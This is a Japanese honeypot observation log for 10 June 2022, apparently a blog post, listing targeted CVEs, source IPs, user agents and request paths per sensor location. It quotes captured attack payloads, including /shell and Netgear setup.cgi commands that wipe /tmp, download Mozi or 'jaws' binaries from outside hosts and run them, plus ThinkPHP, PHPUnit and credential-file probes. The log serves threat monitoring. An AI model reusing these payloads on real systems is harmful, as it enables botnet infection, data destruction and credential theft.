2022/06/10 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

はてなブログに投稿しました。#ハニポで夜更かし

ハニーポット(仮) 観測記録 2022/06/10分です。

特徴

共通

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
.jsへのスキャン行為
/.envへのスキャン行為
/.gitへのスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為

Location:JP

D-link製品の脆弱性を狙うアクセス
JBossの脆弱性を狙うアクセス
curlによるスキャン行為
zgrabによるスキャン行為
/.awsへのスキャン行為
Apache Tomcatへのスキャン行為
WordPressへのスキャン行為
110.242.68.4に関する不正通信

を確認しました。

Location:US

D-link製品の脆弱性を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
Anarchy99によるスキャン行為
curlによるスキャン行為
zgrabによるスキャン行為
/.awsへのスキャン行為
phpMyAdminへのスキャン行為
110.242.68.4に関する不正通信

を確認しました。

Location:UK

GPONルータの脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
zgrabによるスキャン行為
Apache Tomcatへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 0.0.0.0/jaws;
sh /tmp/jaws

Location:SG

Atlassian Jira Server/Data Centerの脆弱性(CVE-2021-26086)を狙うアクセス
D-link製品の脆弱性を狙うアクセス
Drupalの脆弱性(CVE-2018-7600)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
aiohttpによるスキャン行為
zgrabによるスキャン行為
phpMyAdminへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http://192.168.1.1:8088/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

他

アクセス数推移

JP：総アクセス数：156 (前日比：56)
US：総アクセス数：223 (前日比：168)
UK：総アクセス数：55 (前日比：18)
SG：総アクセス数：95 (前日比：-89)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	5.252.194.39	Russia
3	20.70.163.40	United States
1	23.236.203.87	Canada
1	23.251.102.74	United States
1	36.248.89.215	China
20	40.88.43.240	United States
1	44.201.93.179	United States
1	45.95.55.50	Germany
1	45.143.200.118	Russia
1	51.104.54.183	United Kingdom
1	51.159.152.255	France
1	54.157.219.131	United States
1	58.247.217.21	China
1	59.55.155.4	China
1	60.17.105.54	China
1	60.17.112.90	China
1	61.147.15.65	China
3	61.147.15.67	China
1	61.147.15.76	China
15	95.214.235.205	Ukraine
9	103.99.205.88	India
1	108.4.17.241	United States
2	109.237.103.9	Russia
2	109.237.103.123	Russia
1	110.53.241.164	China
1	111.224.235.22	China
1	112.66.109.125	China
1	113.160.222.61	Vietnam
1	114.230.88.118	China
1	122.189.140.24	China
1	123.128.134.181	China
12	125.133.48.123	South Korea
1	132.145.39.16	United States
8	135.125.244.48	France
8	135.125.246.110	France
1	137.184.226.64	United States
1	138.197.104.115	United States
7	139.59.64.16	Singapore
1	143.198.28.172	United States
1	143.198.98.147	United States
1	143.198.155.121	United States
1	149.129.50.37	Singapore
1	150.255.122.221	China
2	157.245.70.127	United States
1	159.223.35.44	United States
1	165.232.137.126	United States
1	174.138.52.43	United States
1	179.43.142.156	Panama
1	179.220.55.201	Brazil
6	185.156.72.6	Russia
1	192.241.206.26	United States
1	192.241.206.144	United States
1	193.56.29.120	United Kingdom
11	193.106.191.48	Russia
1	193.118.53.194	United States
1	193.142.59.15	Germany
4	205.185.118.29	United States
1	205.210.31.26	United States
1	220.250.62.78	China

UserAgent一覧

件数	UserAgent
13	`-`
1	`Abyssal`
1	`Dalvik/2.1.0 (Linux; U; Android 9.0; ZTE BA520 Build/MRA58K)`
1	`MMozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.2.24) Gecko/20111103 Firefox/3.6.24`
5	`Mozila/5.0`
1	`Mozilla/3.0 NAVIO_AOLTV (11; 13; Philips; PH200; 1; R2.0C36_AOL.0110OPTIK; R2.0.0139d_OPTIK)`
1	`Mozilla/5.0 (Linux; Android 6.0; LENNY3 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.85 Mobile Safari/537.36`
18	`Mozilla/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36`
5	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
5	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36`
11	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML`
18	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0`
9	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0`
46	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
3	`Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0`
1	`Mozilla/5.0 (iPod; CPU iPhone OS 6_1_6 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B500 Safari/8536.25`
2	`Mozilla/5.0 AppleWebKit/537.73 (KHTML, like Gecko)`
2	`Mozilla/5.0 zgrab/0.x`
1	`Mozilla/5.01682558 Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/537.36(KHTML, like Gecko) Chrome/40.0.2214.89 Safari/537.36`
1	`P3P Validator`
4	`PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3`
1	`Roku/DVP-9.10 (289.10E04111A)`
1	`curl/7.68.0`
1	`python-requests/2.22.0`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`\x03`
2		`\x16\x03\x01\x01D\x01`
7		`\x16\x03\x01`
1	CONNECT	`cn[.]bing[.]com:443`	HTTP/1.1
1	CONNECT	`www[.]baidu[.]com:443`	HTTP/1.1
1	CONNECT	`www[.]so[.]com:443`	HTTP/1.1
1	CONNECT	`www[.]voanews[.]com:443`	HTTP/1.1
2	GET	`/.aws/credentials`	HTTP/1.1
2	GET	`/.env.bak`	HTTP/1.1
47	GET	`/.env`	HTTP/1.1
2	GET	`/.git/config`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=ja1oj0st`	HTTP/1.1
1	GET	`/_ignition/execute-solution`	HTTP/1.1
3	GET	`/_profiler/phpinfo`	HTTP/1.1
1	GET	`/ab2g`	HTTP/1.1
1	GET	`/ab2h`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
2	GET	`/aws.yml`	HTTP/1.1
3	GET	`/blog/`	HTTP/1.1
3	GET	`/blog/robots.txt`	HTTP/1.1
1	GET	`/c/version.js`	HTTP/1.1
2	GET	`/config.js`	HTTP/1.1
2	GET	`/config/aws.yml`	HTTP/1.1
1	GET	`/console/`	HTTP/1.1
4	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/flu/403.html`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
2	GET	`/info.php`	HTTP/1.1
1	GET	`/invoker/readonly`	HTTP/1.1
1	GET	`/jenkins/login`	HTTP/1.1
1	GET	`/login`	HTTP/1.1
1	GET	`/manager/html`	HTTP/1.1
2	GET	`/phpinfo.php`	HTTP/1.1
2	GET	`/phpinfo`	HTTP/1.1
1	GET	`/portal/redlion`	HTTP/1.1
3	GET	`/robots.txt`	HTTP/1.1
1	GET	`/script`	HTTP/1.1
1	GET	`/solr/`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
1	GET	`/stalker_portal/c/version.js`	HTTP/1.1
1	GET	`/stream/live.php`	HTTP/1.1
1	GET	`/streaming/clients_live.php`	HTTP/1.1
1	GET	`/system_api.php`	HTTP/1.1
1	GET	`/users/sign_in`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/video/26176.html`	HTTP/1.1
1	GET	`/webfig/`	HTTP/1.1
4	GET	`/wordpress/`	HTTP/1.1
4	GET	`/wp/`	HTTP/1.1
3	GET	`/xmlrpc.php?rsd`	HTTP/1.1
1	GET	`/yuuki?pp=env`	HTTP/1.1
1	GET	`http[:]//dongtaiwang[.]com/`	HTTP/1.1
1	GET	`http[:]//www[.]1ucn[.]com/proxychecker/index.php`	HTTP/1.1
1	GET	`http[:]//www[.]minghui[.]org/`	HTTP/1.1
1	GET	`http[:]//www[.]rfa[.]org/english/`	HTTP/1.1
1	GET	`http[:]//www[.]soso[.]com/`	HTTP/1.1
1	GET	`http[:]//www[.]wujieliulan[.]com/`	HTTP/1.1
1	HEAD	`/`	HTTP/1.0
1	HEAD	`/`	HTTP/1.1
1	HEAD	`http[:]//110[.]242[.]68[.]4/`	HTTP/1.1
1	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.1
1	POST	`/_ignition/execute-solution`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
5	POST	`/editBlackAndWhiteList`	HTTP/1.1
2	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	1.85.218.185	China
1	35.172.150.167	United States
1	45.141.157.180	Bulgaria
1	45.143.200.118	Russia
1	45.154.255.138	United Kingdom
5	50.31.21.5	United States
8	51.79.29.48	Canada
1	51.159.152.255	France
40	54.151.130.189	United States
1	59.96.45.83	India
1	69.70.75.46	Canada
1	74.208.245.61	United States
1	92.255.85.183	Hong Kong
1	94.232.40.40	Russia
2	109.237.103.9	Russia
1	110.249.201.162	China
1	112.94.191.137	China
1	119.163.44.211	China
1	124.90.48.107	China
1	128.1.248.42	United States
1	128.14.141.34	United States
1	143.198.227.218	United States
1	144.255.31.45	China
2	157.245.70.127	United States
1	162.142.125.9	United States
1	162.142.125.212	United States
1	164.92.85.122	United States
1	167.94.138.61	United States
1	167.94.146.59	United States
1	171.36.140.251	China
1	175.184.164.35	China
1	179.43.142.156	Panama
1	181.214.218.35	United States
1	183.184.235.90	China
8	185.254.196.223	Ukraine
1	189.139.79.148	Mexico
1	192.241.213.228	United States
1	192.241.221.108	United States
1	192.241.221.236	United States
2	193.56.29.170	United Kingdom
11	193.106.191.48	Russia
1	205.210.31.18	United States
7	206.189.205.4	United States
1	212.102.35.7	United Kingdom
1	220.200.176.170	China
1	221.234.209.134	China
101	223.13.160.140	China

UserAgent一覧

件数	UserAgent
14	`-`
1	`Anarchy99`
2	`Mozila/5.0`
1	`Mozilla/5.0 (Linux; Android 11; M2003J15SC) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.58 Mobile Safari/537.36`
1	`Mozilla/5.0 (Linux; Android 4.4.2; RKM MK902 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https[:]//zhanzhang[.]toutiao[.]com/)`
1	`Mozilla/5.0 (Linux; Android 8.1.0; Moto G (5S) Plus) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36`
3	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
4	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36`
101	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36`
40	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
5	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36`
11	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
18	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:10.0) Gecko/20100101 Firefox/10.0 (Chrome)`
5	`Mozilla/5.0 (iPhone; CPU iPhone OS 11_4 like Mac OS X) AppleWebKit/604.1.34 (KHTML, like Gecko) Mobile/15F79 Safari/604.1`
3	`Mozilla/5.0 zgrab/0.x`
1	`Mozilla/5.01712517 Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36`
4	`PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3`
1	`VLC/3.0.8 LibVLC/3.0.8`
1	`Wget/1.14 (linux-gnu)`
1	`curl/7.68.0`
1	`python-requests/2.22.0`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`-`
3		`\x03`
1		`\x16\x03\x01\x01D\x01`
1		`\x16\x03\x01`
1	CONNECT	`cn[.]bing[.]com:443`	HTTP/1.1
1	CONNECT	`www[.]baidu[.]com:443`	HTTP/1.1
1	CONNECT	`www[.]so[.]com:443`	HTTP/1.1
1	CONNECT	`www[.]voanews[.]com:443`	HTTP/1.1
1	GET	`/.aws/credentials`	HTTP/1.1
1	GET	`/.env.bak`	HTTP/1.1
1	GET	`/.env.dev`	HTTP/1.1
1	GET	`/.env.dist`	HTTP/1.1
1	GET	`/.env.local`	HTTP/1.1
23	GET	`/.env`	HTTP/1.1
2	GET	`/.git/config`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/HNAP1`	HTTP/1.1
1	GET	`/Public/home/js/check.js`	HTTP/1.1
1	GET	`/_ignition/execute-solution`	HTTP/1.1
1	GET	`/_profiler/phpinfo`	HTTP/1.1
1	GET	`/ab2g`	HTTP/1.1
1	GET	`/ab2h`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/actuator/health`	HTTP/1.1
1	GET	`/admin/.env`	HTTP/1.1
1	GET	`/api/.env`	HTTP/1.1
1	GET	`/asdf.php`	HTTP/1.1
1	GET	`/beta/.env`	HTTP/1.1
1	GET	`/c/version.js`	HTTP/1.1
1	GET	`/config.env`	HTTP/1.1
1	GET	`/config.json`	HTTP/1.1
1	GET	`/config/config.json`	HTTP/1.1
1	GET	`/console/`	HTTP/1.1
1	GET	`/dashboard/phpinfo.php`	HTTP/1.1
1	GET	`/debug/default/view?panel=config`	HTTP/1.1
1	GET	`/evox/about`	HTTP/1.1
1	GET	`/flu/403.html`	HTTP/1.1
1	GET	`/frontend_dev.php/$`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
1	GET	`/i.php`	HTTP/1.1
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
1	GET	`/info.json`	HTTP/1.1
1	GET	`/info.php`	HTTP/1.1
1	GET	`/infophp.php`	HTTP/1.1
1	GET	`/infos.php`	HTTP/1.1
1	GET	`/kyc/.env`	HTTP/1.1
1	GET	`/laravel/.env`	HTTP/1.1
1	GET	`/laravel/core/.env`	HTTP/1.1
1	GET	`/linusadmin-phpinfo.php`	HTTP/1.1
1	GET	`/nmaplowercheck1654745908`	HTTP/1.1
1	GET	`/old_phpinfo.php`	HTTP/1.1
1	GET	`/php-info.php`	HTTP/1.1
1	GET	`/php.ini`	HTTP/1.1
1	GET	`/php.php`	HTTP/1.1
1	GET	`/phpinfo.php`	HTTP/1.1
1	GET	`/phpinfo`	HTTP/1.1
101	GET	`/phpmyadmin/`	HTTP/1.1
1	GET	`/phpversion.php`	HTTP/1.1
1	GET	`/pinfo.php`	HTTP/1.1
1	GET	`/portal/redlion`	HTTP/1.1
1	GET	`/prod/.env`	HTTP/1.1
1	GET	`/public/.env`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/solr/`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
1	GET	`/stalker_portal/c/version.js`	HTTP/1.1
1	GET	`/stream/live.php`	HTTP/1.1
1	GET	`/streaming/clients_live.php`	HTTP/1.1
1	GET	`/system_api.php`	HTTP/1.1
1	GET	`/temp.php`	HTTP/1.1
1	GET	`/test.php`	HTTP/1.1
1	GET	`/time.php`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/video/26176.html`	HTTP/1.1
1	GET	`/webfig/`	HTTP/1.1
1	GET	`/wp-config.php.bak`	HTTP/1.1
1	GET	`http[:]//www[.]minghui[.]org/`	HTTP/1.1
1	GET	`http[:]//www[.]rfa[.]org/english/`	HTTP/1.1
1	GET	`http[:]//www[.]soso[.]com/`	HTTP/1.1
1	GET	`http[:]//www[.]wujieliulan[.]com/`	HTTP/1.1
3	HEAD	`/`	HTTP/1.1
1	HEAD	`/`	HTTP/1.0
1	HEAD	`http[:]//110[.]242[.]68[.]4/`	HTTP/1.1
1	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.0
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
2	POST	`/editBlackAndWhiteList`	HTTP/1.1
1	POST	`/sdk`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
4	PRI	`*`	HTTP/2.0

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	45.143.200.118	Russia
1	59.19.247.195	South Korea
1	59.36.168.250	China
1	66.115.182.73	United States
1	66.240.192.82	United States
1	92.255.85.183	Hong Kong
1	104.131.18.211	United States
4	109.237.103.9	Russia
2	109.237.103.123	Russia
1	111.51.8.29	China
1	114.67.249.200	China
1	117.195.94.212	India
1	120.27.248.34	China
1	120.85.91.120	China
1	123.11.78.96	China
1	128.1.248.26	United States
1	128.14.133.58	United States
1	143.244.191.38	United States
1	144.126.215.244	United States
2	157.230.216.203	United States
1	162.142.125.219	United States
7	165.22.228.162	United States
1	170.253.2.246	Spain
1	179.43.142.156	Panama
1	188.165.87.107	France
1	192.241.209.16	United States
1	192.241.213.20	United States
11	193.106.191.48	Russia
1	193.124.7.9	Czechia
5	208.100.26.232	United States

UserAgent一覧

件数	UserAgent
15	`-`
1	`Go-http-client/1.1`
1	`Hello, world`
1	`Mozila/5.0`
1	`Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G532M Build/MMB29T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/7.2 Chrome/59.0.3071.125 Mobile Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
5	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36`
16	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre`
1	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36`
5	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0`
2	`Mozilla/5.0 zgrab/0.x`
1	`Roku/DVP-9.10 (289.10E04111A)`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`-`
2		`\x03`
3		`\x16\x03\x01\x01D\x01`
1		`\x16\x03\x01`
5	GET	`/.env`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/HNAP1`	HTTP/1.1
1	GET	`/_ignition/execute-solution`	HTTP/1.1
1	GET	`/ab2g`	HTTP/1.1
1	GET	`/ab2h`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/actuator/health`	HTTP/1.1
1	GET	`/boaform/admin/formLogin?username=ec8&psd=ec8`	HTTP/1.0
1	GET	`/c/version.js`	HTTP/1.1
1	GET	`/console/`	HTTP/1.1
1	GET	`/evox/about`	HTTP/1.1
2	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/flu/403.html`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
1	GET	`/hunmj_serverApi/test.php`	HTTP/1.1
1	GET	`/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21`	HTTP/1.1
1	GET	`/manager/html`	HTTP/1.1
1	GET	`/nmaplowercheck1654735844`	HTTP/1.1
1	GET	`/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//123[.]11[.]78[.]96:51794/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1`	HTTP/1.0
1	GET	`/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1`	HTTP/1.0
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+0[.]0[.]0[.]0/jaws;sh+/tmp/jaws`	HTTP/1.1
1	GET	`/solr/`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
1	GET	`/stalker_portal/c/version.js`	HTTP/1.1
1	GET	`/stream/live.php`	HTTP/1.1
1	GET	`/streaming/clients_live.php`	HTTP/1.1
1	GET	`/system_api.php`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/video/26176.html`	HTTP/1.1
1	GET	`/webfig/`	HTTP/1.1
1	GET	`http[:]//example[.]com/`	HTTP/1.1
1	HEAD	`/`	HTTP/1.0
1	HEAD	`/`	HTTP/1.1
1	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
1	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	POST	`/editBlackAndWhiteList`	HTTP/1.1
1	POST	`/sdk`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	PRI	`*`	HTTP/2.0

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	2.56.57.72	Netherlands
1	2.139.161.243	Spain
1	13.67.208.62	United States
1	23.251.102.74	United States
6	37.0.8.54	Netherlands
1	45.143.200.118	Russia
11	51.79.29.48	Canada
1	66.240.192.82	United States
1	77.24.101.229	Germany
13	85.159.212.107	United States
1	89.248.173.131	United Kingdom
1	92.255.85.183	Hong Kong
1	94.232.40.40	Russia
1	103.5.126.21	Cambodia
2	109.237.103.9	Russia
2	109.237.103.123	Russia
1	113.91.147.48	China
2	128.199.10.218	United Kingdom
1	134.122.6.44	United States
1	137.184.226.64	United States
1	142.93.66.174	United States
1	143.198.179.189	United States
2	157.230.216.203	United States
1	162.142.125.8	United States
1	162.142.125.211	United States
7	167.71.36.249	United States
1	172.104.138.223	United States
1	178.72.78.123	Russia
1	179.43.142.156	Panama
8	185.254.196.223	Ukraine
1	192.241.205.169	United States
1	192.241.222.147	United States
1	192.241.222.214	United States
2	193.56.29.170	United Kingdom
11	193.106.191.48	Russia
1	193.118.53.202	United States
1	193.124.7.9	Czechia
1	194.28.112.135	Moldova
1	194.31.98.60	Netherlands
1	198.235.24.30	United States

UserAgent一覧

件数	UserAgent
21	`-`
12	`Go-http-client/1.1`
1	`Hello, world`
1	`Mozila/5.0`
1	`Mozilla/5.0 (Linux; Android 9; CPH1859) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36`
1	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.4) Gecko/20030624 Netscape/7.1`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36`
5	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36`
11	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Spotify / 1.1.39.612 Safari / 537.36`
26	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
1	`Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1`
3	`Mozilla/5.0 zgrab/0.x`
1	`Python/3.7 aiohttp/3.7.4.post0`
1	`Wget/1.12 (linux-gnu)`
1	`python-requests/2.18.4`
2	`python-requests/2.21.0`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`HELP`
3		`\x03`
2		`\x16\x03\x01\x01D\x01`
3		`\x16\x03\x01`
1	GET	`/.DS_Store`	HTTP/1.1
30	GET	`/.env`	HTTP/1.1
3	GET	`/.git/config`	HTTP/1.1
1	GET	`//MyAdmin/scripts/setup.php`	HTTP/1.1
1	GET	`//myadmin/scripts/setup.php`	HTTP/1.1
1	GET	`//phpMyAdmin/scripts/setup.php`	HTTP/1.1
1	GET	`//phpmyadmin/scripts/setup.php`	HTTP/1.1
1	GET	`//pma/scripts/setup.php`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>`	HTTP/1.1
1	GET	`/?rest_route=/wp/v2/users/`	HTTP/1.1
